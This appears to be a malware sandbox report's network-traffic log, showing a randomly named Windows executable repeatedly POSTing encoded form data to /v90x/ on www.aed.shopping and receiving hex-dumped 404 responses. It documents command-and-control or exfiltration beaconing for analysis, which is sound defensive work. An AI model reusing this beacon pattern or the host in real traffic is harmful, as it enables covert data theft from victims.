                                                                                              Data Raw: 32 37 36 43 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                              Data Ascii: 276C<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                              Oct 8, 2024 05:30:27.301929951 CEST1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                              Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                              Oct 8, 2024 05:30:27.301945925 CEST1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                              Oct 8, 2024 05:30:27.301954031 CEST672INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                              Oct 8, 2024 05:30:27.301981926 CEST1236INData Raw: 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                              Data Ascii: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////5+fn////////////////////////////////6+vr///////////////////////////////////////+i5edTAAAA
                                                                                              Oct 8, 2024 05:30:27.301990986 CEST1236INData Raw: 53 72 41 55 30 69 46 59 4c 72 48 55 32 52 4b 42 33 71 2b 48 78 44 48 54 34 4a 4b 45 65 32 70 72 68 78 59 31 61 43 53 35 6c 59 2b 48 6e 58 75 36 4e 2b 78 36 49 4a 43 52 51 51 6d 45 45 7a 2b 59 6a 49 45 2f 78 73 2f 4d 6d 44 38 71 48 52 59 4b 35 43
                                                                                              Data Ascii: SrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+HnXu6N+x6IJCRQQmEEz+YjIE/xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHe
                                                                                              Oct 8, 2024 05:30:27.302007914 CEST1236INData Raw: 34 58 68 38 4e 51 4d 2f 64 5a 4d 78 56 4b 44 6b 50 43 79 57 6d 62 50 4a 2f 38 75 49 51 4a 2f 58 62 69 4c 38 62 4e 4b 76 76 30 76 57 6c 4c 43 62 30 66 51 6a 52 39 7a 75 55 31 79 2b 73 53 6b 6a 63 71 73 67 50 41 7a 43 56 47 46 57 7a 50 70 59 78 4a
                                                                                              Data Ascii: 4Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGXIAX3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8
                                                                                              Oct 8, 2024 05:30:27.302022934 CEST1236INData Raw: 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41
                                                                                              Data Ascii: Ymg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==);
                                                                                              Oct 8, 2024 05:30:27.302107096 CEST998INData Raw: 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20
                                                                                              Data Ascii: ="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading">


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.45004235.214.185.243805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:32.400733948 CEST672OUTPOST /v90x/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.aed.shopping
                                                                                              Origin: http://www.aed.shopping
                                                                                              Referer: http://www.aed.shopping/v90x/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 66 58 55 54 50 44 7a 6c 5a 59 50 6c 31 4f 34 30 49 51 79 68 49 65 45 77 50 52 6b 73 2f 4c 59 68 77 4b 54 67 4a 6c 58 56 45 72 79 59 51 38 73 77 4b 62 4f 47 2b 75 53 73 4f 6f 51 35 2b 58 75 7a 51 4a 74 39 51 31 6b 6c 46 44 39 75 6e 6f 6d 6a 54 53 6d 77 4b 65 6f 77 41 4c 78 32 45 51 4c 42 67 6a 61 4d 58 79 39 31 31 30 39 50 68 47 2f 6f 6f 50 79 66 54 36 6e 33 34 44 38 6a 72 50 71 42 54 6c 79 43 6b 66 38 42 2b 31 36 56 56 7a 49 4c 72 41 6b 4e 55 36 30 4e 5a 6a 49 32 46 54 58 78 4c 75 56 43 71 69 56 73 68 74 64 39 7a 61 5a 6e 39 68 71 4f 4b 35 51 58 56 43 41 52 59 77 68 45 57 51 3d 3d
                                                                                              Data Ascii: FJiPC=fXUTPDzlZYPl1O40IQyhIeEwPRks/LYhwKTgJlXVEryYQ8swKbOG+uSsOoQ5+XuzQJt9Q1klFD9unomjTSmwKeowALx2EQLBgjaMXy91109PhG/ooPyfT6n34D8jrPqBTlyCkf8B+16VVzILrAkNU60NZjI2FTXxLuVCqiVshtd9zaZn9hqOK5QXVCARYwhEWQ==
                                                                                              Oct 8, 2024 05:30:33.776416063 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:30:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Cache-Enabled: True
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Link: <http://aed.shopping/wp-json/>; rel="https://api.w.org/"
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                              Content-Encoding: br
                                                                                              Data Raw: 32 38 66 32 0d 0a 15 85 da 51 54 b4 7e 48 11 a9 49 3d 00 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff fc a5 fe 7f 9b 9f af 13 dd b9 06 b5 92 58 bc 06 07 ba 2f 49 ef 16 67 32 0a 1c 6c b5 58 e2 49 f2 f6 28 97 a9 95 ef d3 e7 d5 b5 ba b3 85 d9 06 07 dd 08 04 c8 0b 21 be 1c 41 02 92 e8 65 aa a0 09 66 e9 ff fc 65 9f a9 34 4b 60 c0 90 20 72 08 3c 5f b2 39 74 c6 18 ce 5e a8 da 5f af 5b bd e7 b5 a4 b1 5b 03 e7 b4 46 63 1f e9 a3 86 76 b9 ea 16 bc d7 dd af 5b 3c 84 9a fd 63 d6 cc 12 60 16 18 31 49 9c c4 3d c6 36 42 e8 20 a5 20 0a fc 18 66 a6 f7 7e 13 50 54 40 24 4b 6d b6 a1 ed d0 dd fe f2 ed 43 08 3b 0b 1c 26 43 35 93 b1 c9 2f 17 24 0c 18 a9 f4 04 ed db 90 9c be 9d 2b 83 00 19 be a9 81 b3 7d 8c 65 73 f7 7e f9 21 1a 09 e6 0e 2a c4 09 98 2e 83 56 83 46 da b9 20 a8 f9 8f eb 63 1c dc 95 16 d9 bc ef 2d 48 cf 2b 28 b5 b9 12 96 12 61 87 96 a1 e8 28 8a 9e 61 50 61 ea e0 66 91 e6 65 3f 64 a1 00 ec 75 e1 d3 42 b8 93 a7 65 30 a6 79 57 d1 2c af 6a 16 12 53 95 a1 05 97 40 1b 0f 2d 66 40 7c 5f 53 9a ae e0 d3 19 fe 36 b6 3e 2b [TRUNCATED]
                                                                                              Data Ascii: 28f2QT~HI=)/&>yX/Ig2lXI(!Aefe4K` r<_9t^_[[Fcv[<c`1I=6B f~PT@$KmC;&C5/$+}es~!*.VF c-H+(a(aPafe?duBe0yW,jS@-f@|_S6>+=k7\Jm{jp\KERAiq:,A1&xXBM,bR4JdfxQ2wTD*X._:S^uuHd/"[<yx &9w<rG')zR]IOect~tHV^#>-b.22 ~t+4FunO9"%:0pD"^ow92+m)/MDCXA5aU9*".g&n|GKJ
                                                                                              Oct 8, 2024 05:30:33.776448011 CEST224INData Raw: 74 42 9f 75 12 af 6a f5 6e 50 86 a2 51 6d 7b 83 27 1f 79 96 b0 64 f0 c8 7d c1 e9 9b fe a1 b4 9f 64 cf ac 95 e7 08 c5 06 bd 7d bc ee 97 d2 cb ec 33 71 e0 dd 2f 14 65 b6 88 f8 7a 90 1e 09 c6 91 1e 06 9a 5e d8 7b f7 a8 9d 03 c8 fc b0 f4 8b 01 2c 8a
                                                                                              Data Ascii: tBujnPQm{'yd}d}3q/ez^{,6Cd<C2pz_/'z_7do0i,I>Ej5n>HOu'LHgG5|/}YMcM >Okinv>XeC
                                                                                              Oct 8, 2024 05:30:33.776458025 CEST1236INData Raw: fa 40 c0 0f 79 98 a1 43 2e a5 b4 e7 1f da 80 62 cc d9 82 1c e0 07 6e 55 bb 26 17 85 69 cf 4d 63 bc f7 fd 42 eb 76 2c bf ae 4c 87 e3 b1 97 50 87 d3 59 dc 58 57 68 e6 89 4c ef fb d2 34 23 7d f6 42 58 4d e4 5d dd 52 3a 4b 68 ae 7c 82 1a 91 e6 65 84
                                                                                              Data Ascii: @yC.bnU&iMcBv,LPYXWhL4#}BXM]R:Kh|e2YXW+<G$_F=@)")pa40)3$IU%4h}%+7xWH2db]!!=wrUEY\GM[jN9#ScjD]a:
                                                                                              Oct 8, 2024 05:30:33.776473045 CEST1236INData Raw: 1a 9d db d2 79 dc 75 d3 c8 6f 4f 47 d6 e3 4c 8d 2c ec 21 08 c3 55 2a 39 25 c7 42 2a 66 16 77 9f ec b8 ac 82 c9 9b a5 f9 d3 39 98 e7 d6 b1 e3 11 fa 31 57 e3 d6 14 fe 7c 0d da 5b e9 3c cf 18 ec fe 30 2f a0 75 9a 11 5e 9f 96 e1 7b 4c f2 1c fe 7a d7
                                                                                              Data Ascii: yuoOGL,!U*9%B*fw91W|[<0/u^{LzS/H&L'}HE11]dzHbxND"IptEo1-_r3[<YVb9R>Ob&3cJda}8ZS;Ds]?6{Z
                                                                                              Oct 8, 2024 05:30:33.776489973 CEST1236INData Raw: 12 c1 61 3d 9f 73 a5 c3 89 c0 10 5f e2 c1 e6 b4 3c a6 6c d1 f4 e7 1e 77 c7 44 0c ea 62 b7 ca 71 1a 60 9f 26 b6 ef 72 92 d3 68 f2 bd ae f8 38 90 48 f0 39 b9 98 a8 30 0a 8b d9 21 61 4e 2d dd c1 2b 5e d9 8a 65 d5 bf f6 97 9e aa 6e 04 45 10 5c c5 12
                                                                                              Data Ascii: a=s_<lwDbq`&rh8H90!aN-+^enE\A*,J<vQQ! B|njZizqa`C&7kB'l!0l)m1wv>alOd'drK^GMR.RHlM"I>DjWe_.Llr
                                                                                              Oct 8, 2024 05:30:33.776498079 CEST672INData Raw: 8b a5 82 63 68 2c e5 74 c2 f4 7f c8 0a 13 6e 03 bd 41 65 0e 2f 66 65 e1 39 5f c1 91 6e 22 bc 22 cc dc e9 db 18 cf e3 3a ff cc b8 00 97 c7 96 e0 c3 4a b3 ed 36 36 d9 23 46 fc 6c 6f 39 86 a0 ce 70 7a b6 27 ef 48 b7 6e dc fc a0 37 d4 da 68 76 d9 ab
                                                                                              Data Ascii: ch,tnAe/fe9_n"":J66#Flo9pz'Hn7hv&55O#}VS'dJd.'=FlX8xDfS#ikEH#-#yQh);:rNJ4E3mSWZ=~7nKAO&_neYi
                                                                                              Oct 8, 2024 05:30:33.776505947 CEST1236INData Raw: 57 cf 8f b6 10 3e 37 e2 9a ff 29 b6 7f 1c cb bf 9e a6 75 2d 8f 4f 79 ec 16 58 22 50 5d de 38 c2 9a 2f 53 86 5b 87 70 cd fd 53 56 83 df 08 63 be e5 eb e7 42 f8 22 8e 5b 5c 5e 55 8f f0 57 73 1b b7 1b c2 d2 7c 8f 9f 5c 36 de 03 33 f2 81 f4 69 55 29
                                                                                              Data Ascii: W>7)u-OyX"P]8/S[pSVcB"[\^UWs|\63iU) _ws>Bg7q4&g{yzzbiOy:6D5<1#=@JY,q2Gwn`zzU=CLf&jbDCkec.oBqE
                                                                                              Oct 8, 2024 05:30:33.776521921 CEST1236INData Raw: c2 e9 a3 cf 05 60 a9 12 d0 f6 c7 8f e4 43 d0 b1 f4 0f 8c ee 7d 88 d0 b8 14 1c a4 a8 61 f9 9d 96 ba 78 08 aa 15 16 90 30 55 d5 d0 11 c3 d2 9c 94 b4 14 33 ec a9 6c f8 52 bd 29 9a ef 8d 58 d5 04 d4 20 78 10 95 41 f1 75 43 c9 6d 87 6a d5 12 d0 52 51
                                                                                              Data Ascii: `C}ax0U3lR)X xAuCmjRQ jG!B5q4_,H%]a\T,CYY0aaF7.8Ibg2y]5P5^;(KP/~EhEp]hBKh
                                                                                              Oct 8, 2024 05:30:33.776542902 CEST1236INData Raw: 48 aa e8 91 a3 b7 bf 82 e6 f0 57 90 0f 5f 99 5a 26 1a 35 4e a6 62 98 d8 e9 5c 4f 27 ba 9d 7d 85 76 d4 ee ef fe 38 64 95 2e 44 a5 ac 0d 9c 7c ca a1 f5 f6 6c 5b 5d 1a d3 a4 10 4d 56 1a 0c 33 c4 9d d5 80 39 95 70 77 8c fa 2a 30 fd 4c 72 7d d7 cd 5e
                                                                                              Data Ascii: HW_Z&5Nb\O'}v8d.D|l[]MV39pw*0Lr}^{Eey5T-Puz*.~+:|2%:9&l9ii)OwMC0VhnFRv(;*VD+5j"nuGSgifuSH>0GT
                                                                                              Oct 8, 2024 05:30:33.776554108 CEST104INData Raw: a2 20 ce 4b 8f 42 b9 2a ba 66 87 9a 64 34 ea 52 8b 5b d7 fb 57 c4 2f 3d 5b 10 a4 d3 47 38 a1 b4 f2 0d b4 90 9a f7 b5 31 ac a5 73 9a bd cf 5e 7f 1d 4f 2f 16 20 f0 26 4f 43 49 cb 09 ef da ad 71 38 92 db e4 98 54 ba 3b d5 0f 5d c1 80 6e 93 f3 96 88
                                                                                              Data Ascii: KB*fd4R[W/=[G81s^O/ &OCIq8T;]nutm%{99 *
                                                                                              Oct 8, 2024 05:30:33.776603937 CEST1236INData Raw: b0 40 4a 6c ac ac 1d 8d ee 38 07 f3 a2 fc 85 10 0a 46 5e 02 87 11 c4 37 5a eb 8b 58 bd 43 88 45 82 2b 08 bb 9e 00 b5 7b 67 3e a5 13 48 53 b1 6c e7 22 e5 73 31 e1 29 ff fd 53 52 98 8b 6c 17 cf 53 58 06 3f ef 9c b8 3b 67 77 d3 0b 58 7e e7 ec 3a 3d
                                                                                              Data Ascii: @Jl8F^7ZXCE+{g>HSl"s1)SRlSX?;gwX~:=76o5d_yQL5oD;it4P_ElHl~I$s}nxmTiW@ai^J=*O![J{']nv_-h vRc2'8
                                                                                              Oct 8, 2024 05:30:33.776613951 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:30:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Cache-Enabled: True
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Link: <http://aed.shopping/wp-json/>; rel="https://api.w.org/"
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                              Content-Encoding: br
                                                                                              Data Raw: 32 38 66 32 0d 0a 15 85 da 51 54 b4 7e 48 11 a9 49 3d 00 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff fc a5 fe 7f 9b 9f af 13 dd b9 06 b5 92 58 bc 06 07 ba 2f 49 ef 16 67 32 0a 1c 6c b5 58 e2 49 f2 f6 28 97 a9 95 ef d3 e7 d5 b5 ba b3 85 d9 06 07 dd 08 04 c8 0b 21 be 1c 41 02 92 e8 65 aa a0 09 66 e9 ff fc 65 9f a9 34 4b 60 c0 90 20 72 08 3c 5f b2 39 74 c6 18 ce 5e a8 da 5f af 5b bd e7 b5 a4 b1 5b 03 e7 b4 46 63 1f e9 a3 86 76 b9 ea 16 bc d7 dd af 5b 3c 84 9a fd 63 d6 cc 12 60 16 18 31 49 9c c4 3d c6 36 42 e8 20 a5 20 0a fc 18 66 a6 f7 7e 13 50 54 40 24 4b 6d b6 a1 ed d0 dd fe f2 ed 43 08 3b 0b 1c 26 43 35 93 b1 c9 2f 17 24 0c 18 a9 f4 04 ed db 90 9c be 9d 2b 83 00 19 be a9 81 b3 7d 8c 65 73 f7 7e f9 21 1a 09 e6 0e 2a c4 09 98 2e 83 56 83 46 da b9 20 a8 f9 8f eb 63 1c dc 95 16 d9 bc ef 2d 48 cf 2b 28 b5 b9 12 96 12 61 87 96 a1 e8 28 8a 9e 61 50 61 ea e0 66 91 e6 65 3f 64 a1 00 ec 75 e1 d3 42 b8 93 a7 65 30 a6 79 57 d1 2c af 6a 16 12 53 95 a1 05 97 40 1b 0f 2d 66 40 7c 5f 53 9a ae e0 d3 19 fe 36 b6 3e 2b [TRUNCATED]
                                                                                              Data Ascii: 28f2QT~HI=)/&>yX/Ig2lXI(!Aefe4K` r<_9t^_[[Fcv[<c`1I=6B f~PT@$KmC;&C5/$+}es~!*.VF c-H+(a(aPafe?duBe0yW,jS@-f@|_S6>+=k7\Jm{jp\KERAiq:,A1&xXBM,bR4JdfxQ2wTD*X._:S^uuHd/"[<yx &9w<rG')zR]IOect~tHV^#>-b.22 ~t+4FunO9"%:0pD"^ow92+m)/MDCXA5aU9*".g&n|GKJ
                                                                                              Oct 8, 2024 05:30:33.780059099 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:30:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Cache-Enabled: True
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Link: <http://aed.shopping/wp-json/>; rel="https://api.w.org/"
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                              Content-Encoding: br
                                                                                              Data Raw: 32 38 66 32 0d 0a 15 85 da 51 54 b4 7e 48 11 a9 49 3d 00 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff fc a5 fe 7f 9b 9f af 13 dd b9 06 b5 92 58 bc 06 07 ba 2f 49 ef 16 67 32 0a 1c 6c b5 58 e2 49 f2 f6 28 97 a9 95 ef d3 e7 d5 b5 ba b3 85 d9 06 07 dd 08 04 c8 0b 21 be 1c 41 02 92 e8 65 aa a0 09 66 e9 ff fc 65 9f a9 34 4b 60 c0 90 20 72 08 3c 5f b2 39 74 c6 18 ce 5e a8 da 5f af 5b bd e7 b5 a4 b1 5b 03 e7 b4 46 63 1f e9 a3 86 76 b9 ea 16 bc d7 dd af 5b 3c 84 9a fd 63 d6 cc 12 60 16 18 31 49 9c c4 3d c6 36 42 e8 20 a5 20 0a fc 18 66 a6 f7 7e 13 50 54 40 24 4b 6d b6 a1 ed d0 dd fe f2 ed 43 08 3b 0b 1c 26 43 35 93 b1 c9 2f 17 24 0c 18 a9 f4 04 ed db 90 9c be 9d 2b 83 00 19 be a9 81 b3 7d 8c 65 73 f7 7e f9 21 1a 09 e6 0e 2a c4 09 98 2e 83 56 83 46 da b9 20 a8 f9 8f eb 63 1c dc 95 16 d9 bc ef 2d 48 cf 2b 28 b5 b9 12 96 12 61 87 96 a1 e8 28 8a 9e 61 50 61 ea e0 66 91 e6 65 3f 64 a1 00 ec 75 e1 d3 42 b8 93 a7 65 30 a6 79 57 d1 2c af 6a 16 12 53 95 a1 05 97 40 1b 0f 2d 66 40 7c 5f 53 9a ae e0 d3 19 fe 36 b6 3e 2b [TRUNCATED]
                                                                                              Data Ascii: 28f2QT~HI=)/&>yX/Ig2lXI(!Aefe4K` r<_9t^_[[Fcv[<c`1I=6B f~PT@$KmC;&C5/$+}es~!*.VF c-H+(a(aPafe?duBe0yW,jS@-f@|_S6>+=k7\Jm{jp\KERAiq:,A1&xXBM,bR4JdfxQ2wTD*X._:S^uuHd/"[<yx &9w<rG')zR]IOect~tHV^#>-b.22 ~t+4FunO9"%:0pD"^ow92+m)/MDCXA5aU9*".g&n|GKJ


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.45004335.214.185.243805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:35.319402933 CEST692OUTPOST /v90x/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.aed.shopping
                                                                                              Origin: http://www.aed.shopping
                                                                                              Referer: http://www.aed.shopping/v90x/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 66 58 55 54 50 44 7a 6c 5a 59 50 6c 31 76 49 30 48 51 4f 68 4f 2b 45 76 41 78 6b 73 31 72 59 6c 77 4b 66 67 4a 6b 54 46 48 59 57 59 58 63 63 77 62 70 6d 47 39 75 53 73 46 49 51 34 39 6e 75 34 51 4a 77 43 51 30 59 6c 46 44 5a 75 6e 6f 57 6a 53 6b 75 7a 62 65 6f 2b 56 62 78 4f 41 51 4c 42 67 6a 61 4d 58 79 59 65 31 77 52 50 68 58 50 6f 70 71 4f 63 61 61 6e 77 75 54 38 6a 39 2f 71 64 54 6c 79 30 6b 62 30 6e 2b 77 32 56 56 79 34 4c 72 52 6b 4f 65 36 30 48 58 44 4a 39 4c 57 32 65 4e 63 63 77 6f 42 42 73 67 66 78 66 2f 38 49 39 73 51 4c 5a 59 35 30 6b 49 46 4a 6c 56 7a 63 4e 4e 62 61 68 66 56 64 7a 6a 61 63 76 37 47 75 65 79 68 36 53 6c 39 49 3d
                                                                                              Data Ascii: FJiPC=fXUTPDzlZYPl1vI0HQOhO+EvAxks1rYlwKfgJkTFHYWYXccwbpmG9uSsFIQ49nu4QJwCQ0YlFDZunoWjSkuzbeo+VbxOAQLBgjaMXyYe1wRPhXPopqOcaanwuT8j9/qdTly0kb0n+w2VVy4LrRkOe60HXDJ9LW2eNccwoBBsgfxf/8I9sQLZY50kIFJlVzcNNbahfVdzjacv7Gueyh6Sl9I=
                                                                                              Oct 8, 2024 05:30:36.030699968 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:30:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              X-Cache-Enabled: True
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Link: <http://aed.shopping/wp-json/>; rel="https://api.w.org/"
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                              Content-Encoding: br
